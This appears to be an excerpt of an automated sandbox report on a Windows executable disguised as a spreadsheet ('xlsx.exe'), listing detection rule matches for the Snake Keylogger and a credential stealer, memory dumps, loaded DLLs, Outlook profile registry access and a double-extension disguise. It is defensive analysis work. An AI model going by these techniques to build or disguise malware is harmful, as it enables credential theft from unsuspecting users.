                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                    Source: 00000001.00000002.4128942629.0000000000502000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 00000000.00000002.1686826085.0000000003CE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2488, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: Process Memory Space: DC74433Y7889021.xlsx.exe PID: 2992, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                    Source: 0.2.DC74433Y7889021.xlsx.exe.5590000.5.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e95e40.2.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3e52a10.3.raw.unpack, ---.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, DarkListView.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.5590000.5.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: 0.2.DC74433Y7889021.xlsx.exe.3d5a970.4.raw.unpack, DarkComboBox.csBase64 encoded string: 'Uwm+UuKGd614I69RzLI93aXq8M4plP4Fl8XGnAA54HkS/0jMOBsYAdDU3ufQvFFjYZJP0JeYZcnDYanLTNfb9IJuC/u1be1KdJkORevGYuzVlkHzJtU9FNAhjxyJAuY/'
                    Source: DC74433Y7889021.xlsx.exe, W--.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: DC74433Y7889021.xlsx.exe, W--.csSecurity API names: System.Security.AccessControl.W_26CA_0306.GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, -.csSecurity API names: System.Security.AccessControl._0385.GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, -.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: DC74433Y7889021.xlsx.exe, .csSecurity API names: System.Security.AccessControl..GetAccessControlSectionsFromChanges()
                    Source: DC74433Y7889021.xlsx.exe, .csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@4/4
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DC74433Y7889021.xlsx.exe.logJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeMutant created: NULL
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: DC74433Y7889021.xlsx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile read: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess created: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe "C:\Users\user\Desktop\DC74433Y7889021.xlsx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: riched20.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: usp10.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeAutomated click: Continue
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\GT350\source\repos\UpdatedRunpe\UpdatedRunpe\obj\x86\Debug\AQipUvwTwkLZyiCs.pdb source: DC74433Y7889021.xlsx.exe, 00000000.00000002.1688208679.0000000005620000.00000004.08000000.00040000.00000000.sdmp, DC74433Y7889021.xlsx.exe, 00000000.00000002.1686646737.0000000002CE1000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdb source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: System.Windows.Forms.pdbt source: DC74433Y7889021.xlsx.exe, 00000001.00000002.4136425444.0000000005C99000.00000004.00000020.00020000.00000000.sdmp
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: 0xA8818C66 [Sat Aug 2 15:06:14 2059 UTC]
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 0_2_072375F3 push eax; retf 0_2_072375F9
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 0_2_07230006 push ss; retf 0_2_0723001D
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 0_2_0723CA9D push FFFFFF8Bh; iretd 0_2_0723CA9F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B891E pushad ; iretd 1_2_023B891F
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B8C2F pushfd ; iretd 1_2_023B8C30
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_023B8DDF push esp; iretd 1_2_023B8DE0
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_060E9241 push es; ret 1_2_060E9244
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_08F87860 push es; ret 1_2_08F87870
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeCode function: 1_2_090D12B1 push es; ret 1_2_090D12D0
                    Source: DC74433Y7889021.xlsx.exeStatic PE information: section name: .text entropy: 7.549042885897216

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Uses an obfuscated file name to hide its real file extension (double extension)
                    Source: Possible double extension: xlsx.exeStatic PE information: DC74433Y7889021.xlsx.exe
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\DC74433Y7889021.xlsx.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
